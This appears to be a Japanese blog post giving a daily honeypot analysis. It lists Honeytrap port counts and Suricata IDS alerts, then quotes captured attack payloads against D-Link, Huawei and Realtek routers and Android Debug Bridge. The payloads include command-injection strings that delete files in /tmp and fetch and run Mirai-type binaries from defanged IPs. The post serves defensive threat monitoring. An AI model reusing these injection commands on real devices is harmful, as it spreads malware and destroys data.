ハニーポット簡易分析(20日目:8/27)
8/27の分析となります。 先日、IDSである Suricataを導入しましたので、そちらの結果も記載しています(まだまだ、チューニングが必要ですが。。。)
8/27 Honeytrap分析結果
※なお、80ポートの通信は含まれていません。
検知数:7802件(データ部 0byte以上 3606件)
ポート | 件数 | 割合 | サービス | 補足 |
445 | 1,992 | 47.95% | SMB | |
220 | 292 | 7.03% | IMAP3 |
コマンド:SSH-2.0-libssh2_1.4.3 |
1433 | 68 | 1.64% | Microsoft SQL Server | |
3389 | 57 | 1.37% | RDP | |
52869 | 51 | 1.23% | D-Link, Realtek SDK | マルウェアダウンロード |
22 | 48 | 1.16% | SSH | |
35928 | 42 | 1.01% | ? | マルウェアダウンロード |
81 | 41 | 0.99% | ? | |
3390 | 39 | 0.94% | ? | |
8080 | 36 | 0.87% | PROXY |
IDSの検知
※全ポートの通信を含んでいます。
シグネチャ名 | 検知数 | 割合 |
POLICY Cleartext WordPress Login | 6,301 | 99.31% |
HTTP missing Host header | 43 | 0.68% |
SMTP no server welcome message | 1 | 0.02% |
宛先ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://148.72.176[.]78/ngynx && sh ngynx`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.32[.]156/bin && sh /tmp/bin`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://176.32.33[.]171/kenjiro.mips && chmod 777 /tmp/kenjiro.mips/ && /tmp/kenjiro.mips`
・SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp; >DIR & cd /var; >DIR; rm -rf *; wget hxxp://148.72.176[.]78/ken.sh; sh ken.sh`
宛先ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
・$(busybox wget -g 168.235.82[.]217 -l /tmp/xDvAq -r mpswof ;chmod +x /tmp/xDvAq ;/tmp/xDvAq h)
宛先ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→mirai関連のマルウェア
POST /picsdesc.xml HTTP/1.1
・cd /tmp/;wget hxxp://80.211.47[.]28/jackmymips
・cd /tmp/;wget hxxp://159.65.232[.]56/xd.mips
・cd /tmp/;wget hxxp://107.191.99[.]41/elf.mips -O elf
・cd /tmp/;wget hxxp://142.93.1[.]75/hoho.mips -O hoho
・cd /tmp/;wget hxxp://167.99.228[.]78/ntpd.mips -O ntpd
・cd /tmp/;wget hxxp://167.99.228[.]78/8mips8.mips -O 8mips8
・cd /tmp/;wget hxxp://128.199.45[.]173/sora.mips -O sora.mips
宛先ポート:5555
①Android Debug Bridge に対する攻撃
CNXN............2...¼±§±host::.OPEN........Ý...&A..°¯º±shell:cd /data/local/tmp;wget hxxp://207.148.78.[.]52/br -O- >br;sh br;busybox wget hxxp://207.148.78[.]152/r -O- >r;sh r;curl hxxp://207.148.78.152/c >c;sh c;busybox curl hxxp://207.148.78[.]152/bc >bc;sh bc;rm -rf bc br r c;.
CNXN............2...¼±§±host::.OPEN)...........O/..°¯º±shell:cd /data/local/tmp/; busybox wget hxxp://27.102.115.[.]44/adbs -O -> adbs; sh adbs; curl hxxp://27.102.115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2.
特段、傾向的に大きく変わったものはありませんでした。
IDSはデフォルトのまま導入していることもあり、チューニングしないと有効な分析は出来なさそうでした。現状は、Wordpressのログイン試行を大量に検知したことぐらいが分かるものでした。チューニングは9月ごろから本格的に実施出来ればと思っています。
以上、今回の簡易分析結果でした。